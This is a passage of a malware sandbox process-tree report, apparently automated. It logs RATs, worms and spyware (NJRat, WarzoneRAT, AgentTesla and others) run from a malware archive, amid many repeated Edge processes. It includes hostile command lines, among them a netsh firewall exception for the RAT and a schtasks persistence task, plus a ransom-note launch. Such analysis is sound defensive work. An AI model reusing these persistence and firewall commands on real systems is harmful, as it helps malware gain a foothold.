  2⤵
  PID:2652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:5828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:2612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:6220
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:2108
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:7164
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:5628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:704
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:5640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:2788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:6416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:2452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:7816
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:7832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:7892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:7920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:8032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:8128

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\RAT\NJRat.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\RAT\NJRat.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4656
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\RAT\NJRat.exe" "NJRat.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  PID:3592

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\RAT\WarzoneRAT.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\RAT\WarzoneRAT.exe"
1⤵
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
PID:3896
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp32A2.tmp"
  2⤵
  - Creates scheduled task(s)
  PID:5936
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
  2⤵
  PID:4600

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Worm\Bumerang.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Worm\Bumerang.exe"
1⤵
- Drops file in System32 directory
PID:1232
- C:\Windows\SysWOW64\ddraw32.dll
  C:\Windows\system32\ddraw32.dll
  2⤵
  - Executes dropped EXE
  PID:552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 344
    3⤵
    - Program crash
    PID:2872
- C:\Windows\SysWOW64\ddraw32.dll
  C:\Windows\system32\ddraw32.dll :C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Worm\Bumerang.exe
  2⤵
  - Executes dropped EXE
  PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 552 -ip 552
1⤵
PID:4708

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3096

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Worm\Mantas.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Worm\Mantas.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- NTFS ADS
PID:4332

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Amus.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Amus.exe"
1⤵
- Chimera
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6816
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Music\YOUR_FILES_ARE_ENCRYPTED.HTML"
  2⤵
  - Modifies Internet Explorer settings
  PID:6584

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6204

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Duksten.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Duksten.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:7008
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 612
  2⤵
  - Program crash
  PID:6600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7008 -ip 7008
1⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Magistr.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Magistr.exe"
1⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Mari.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Email-Worm\Mari.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1600

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6156

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\AgentTesla.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\AgentTesla.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1584

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\HawkEye.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Spyware\HawkEye.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6464

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7144

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:4444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
  2⤵
  PID:6844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 /prefetch:3
  2⤵
  PID:2972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2368 /prefetch:8
  2⤵
  PID:5748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
  2⤵
  PID:6048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:4032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
  2⤵
  PID:2024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:2424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
